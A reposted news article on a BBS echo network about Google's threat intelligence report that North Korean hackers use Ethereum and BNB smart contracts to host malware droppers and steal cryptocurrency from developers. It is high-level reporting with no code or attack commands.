TZUTC: -0500   
   MSGID: 1613.consprcy@1:2320/105 2d5a2ebd   
   PID: Synchronet 3.21a-Linux master/123f2d28a Jul 12 2025 GCC 12.2.0   
   TID: SBBSecho 3.28-Linux master/123f2d28a Jul 12 2025 GCC 12.2.0   
   BBSID: CAPCITY2   
   CHRS: ASCII 1   
   FORMAT: flowed   
   North Korean hackers found hiding crypto-stealing malware with Blockchain   
      
   Date:   
   Fri, 17 Oct 2025 16:35:00 +0000   
      
   Description:   
   State-sponsored actors are using Ethereum and BNB to host malware and steal   
   people's money.   
      
   FULL STORY   
      
   North Korean state-sponsored threat actors are now using public blockchains    
   to host malicious code and deploy malware on target endpoints.    
      
   This is according to Googles Threat Intelligence Group (GTIG) , who said they   
   observed UNC5342 using Ethereum and BNB to host droppers and ultimately    
   deploy cryptocurrency-stealing malware against software and blockchain   
   developers.    
      
   The technique is called EtherHiding. Instead of sending a malicious file   
   directly to the victim (or otherwise tricking them into downloading it), they   
   encode parts of the malware into blockchain transactions and smart contracts.   
      
   Evolution of bulletproof hosting    
      
   The smart contract itself doesnt execute malware automatically on someones   
   computer, but it can deliver instructions or code when a user interacts with   
   it (when they click a link, run a script, or connect a crypto wallet).    
      
   The blockchain is a great place to store and distribute malware since it is   
   public, immutable, and almost impossible to tamper.    
      
   This represents a shift toward next-generation bulletproof hosting, Google   
   said, stressing that the blockchains resilient nature is what makes it so   
   enticing for cybercrooks.    
      
   From February, UNC5342 was observed creating fake jobs and coding challenges    
   , tricking developers and others working in the Web3 space to download   
   different files. These files connect to the blockchain and retrieve the code   
   which, in turn, installs the JadeSnow loader. This loader drops the   
   InvisibleFerret backdoor, which was already observed used in cryptocurrency   
   thefts.    
      
   This is not the first time were seeing blockchain being used to deliver   
   malware. The technique has been in use since 2023, and in the same report,   
   Google also mentioned a financially motivated actor UNC5142 using the same   
   technique.    
      
   This group was seen compromising WordPress sites to host malicious JavaScript   
   code that connected to the blockchain. More than 14,000 infected sites were   
   found so far.    
      
   North Korea is known for targeting the crypto industry and using the stolen   
   funds to finance its weapons program and state apparatus.    
      
    Via The Record    
      
   ======================================================================   
   Link to news story:   
   https://www.techradar.com/pro/security/north-korean-hackers-found-hiding-crypt   
   o-stealing-malware-with-blockchain   
      
   $$   
   --- SBBSecho 3.28-Linux   
    * Origin: capitolcityonline.net * Telnet/SSH:2022/HTTP (1:2320/105)   
   SEEN-BY: 105/81 106/201 128/187 129/14 305 153/7715 154/110 218/700   
   SEEN-BY: 226/30 227/114 229/110 111 206 300 307 317 400 426 428 470   
   SEEN-BY: 229/664 700 705 266/512 291/111 320/219 322/757 342/200 396/45   
   SEEN-BY: 460/58 633/280 712/848 902/26 2320/0 105 304 3634/12 5075/35   
   PATH: 2320/105 229/426